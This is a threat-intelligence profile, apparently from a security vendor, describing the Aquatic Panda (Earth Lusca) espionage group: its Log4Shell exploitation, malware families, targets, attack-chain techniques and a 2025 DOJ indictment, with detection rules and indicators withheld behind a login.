Aquatic Panda (Earth Lusca) APT - Log4Shell Exploitation and Multi-Platform Backdoor Campaigns Targeting 17 Countries — Threadlinqs Intelligence
Threat ID: TL-2026-0986 · Severity: CRITICAL · CVSS: 10 · Status: ACTIVE · Category: VULNERABILITY
Attribution: Earth Lusca · China · ESPIONAGE
China-aligned APT Aquatic Panda (aka Earth Lusca) conducts targeted intelligence collection and industrial espionage across telecommunications, government, NGOs, and academic institutions using
Aquatic Panda is a China-aligned advanced persistent threat (APT) group active since at least May 2020, focusing on intelligence collection and industrial espionage against critical infrastructure sectors. Operating under multiple aliases (Earth Lusca, TAG-22, FishMonger, BRONZE UNIVERSITY, Charcoal Typhoon, CHROMIUM, FISHMONGER, Red Dev 10, Red Scylla, RedHotel) and affiliated with the Winnti Group umbrella, the group maintains extensive C2 infrastructure (50+ servers hosted in China) for multi-platform command and control.
The group's primary exploitation vector is CVE-2021-44228 (Log4Shell), a critical remote code execution vulnerability in Apache Log4j2 with CVSS 10.0. Since the public disclosure in December 2021, this vulnerability has been actively exploited by multiple threat actors including Aquatic Panda, enabling arbitrary code execution on vulnerable Java logging services across government networks, telecommunications infrastructure, and critical sectors.
Aquatic Panda's malware arsenal includes SprySOCKS (Linux/Windows backdoor with kernel driver variants RawWNPF), ShadowPad (modular backdoor suite), BIOPASS RAT (Python-based RAT with screen capture via OBS Studio framework), KTLVdoor (obfuscated Golang multiplatform backdoor), SodaMaster, Spyder, and RPipeCommander. The RawWNPF kernel driver component hooks NtQuerySystemInformation, implements filesystem minifilter callbacks, manipulates Windows Filtering Platform (WFP) callouts to hide network connections, and enables TCP traffic diversion for stealthy command delivery.
Operation FishMedley (January-October 2022) compromised seven government, NGO, think tank, and Catholic charity targets across Taiwan, Hungary, Turkey, Thailand, United States, and France. Broader targeting spans 17 countries (2021-2023) across Asia, Europe, and North America with focus on telecommunications operators, government agencies, academic institutions, and policy analysis organizations.
Attack chain methodology includes initial access via existing privileged access (domain administrator credentials), lateral movement using Impacket-based network traversal and WMI, credential harvesting (LSASS dumping, Firefox database extraction, registry hive collection), reconnaissance (fscan/nbtscan network scanning), and data exfiltration via Dropbox integration. TTPs leverage PowerShell scripting, Base64 encoding, EDR evasion techniques, and living-off-the-land binaries.
DOJ Cyber Investigations indictment (March 5, 2025) charged I-SOON CEO Wu Haibo, COO Chen Cheng, and technical staff with conducting cyber-espionage operations (2016-2023) funded by the Chinese government. The FBI added indicted individuals to its Most Wanted Cyber Threat Actors list, confirming state-sponsored attribution with HIGH confidence.
Weaknesses (CWE)
CWE-917, CWE-20, CWE-400, CWE-502, CWE-269, CWE-78, CWE-94
Target sectors: telecoms, government administration, critical-infrastructure, finance, technology, energy, health, academia, think tanks, ngo, cryptocurrency-trading, defense-contractors
Target regions: taiwan, hong kong, thailand, pakistan, vietnam, philippines, indonesia, malaysia, singapore, hungary, turkey, france
Detections & IOCs
This threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 26 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
VULNERABILITY, CRITICAL, threat intelligence, cybersecurity, CVE-2021-44228, T1190, T1566, T1598, T1059, T1210, T1204, T1547, T1543, T1547, T1505